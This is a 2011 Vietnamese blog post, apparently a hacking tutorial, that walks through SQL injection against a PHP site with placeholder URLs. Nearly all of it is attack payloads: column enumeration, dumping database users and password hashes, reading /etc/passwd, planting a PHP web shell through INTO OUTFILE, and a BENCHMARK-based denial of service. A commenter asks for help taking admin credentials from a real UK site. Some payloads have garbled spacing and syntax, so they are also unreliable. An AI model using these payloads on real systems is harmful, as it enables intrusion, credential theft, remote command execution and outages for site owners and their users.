Thứ Tư, 23 tháng 3, 2011

TUT hack php

06:57 zeko sock 1 comment

http://www.site.ru/index.php?page=1 '
Bay ra 1 cái đại loại thế nè 
MySQL Error: mysql_query (.......) error expretion syntax ...
99% lỗi
số col nhé

Quote:
? id =- 1 + + by order +7 / *
đến 7 nó lỗi mà 6 chưa lỗi thì

Quote:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5,6 / *
hình ở link nó hiện ra số,exp là 3

Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *->user
Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *->version
Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *--database name
get pass mysql

Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
Get info trong 1 tab khi biết col+Tab

Quote:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, name, passwd, 4,5,6 + + from users / *
Đọc file trên server nếu có perm và biết path

Quote:
http://www.site.ru/index.php?page=-1+ union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
Chèn shell

Quote:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '<? php system ($ _GET [cmd]);>' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *
DDos bằng mysql

Quote:
http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md5 (current_date)))
cái nè làm cho mysql chạy như điên,process lên 99% cash luôn máy(dã test)

Posted in: ,,

1 nhận xét:

Nặc danh nói...

mình tìm được 1 site UK nhưng không thể nào tìm ID với pass admin bạn có thể giúp mình không

lúc 07:19 9 tháng 5, 2011

Đăng nhận xét

 
Design by mkha.hero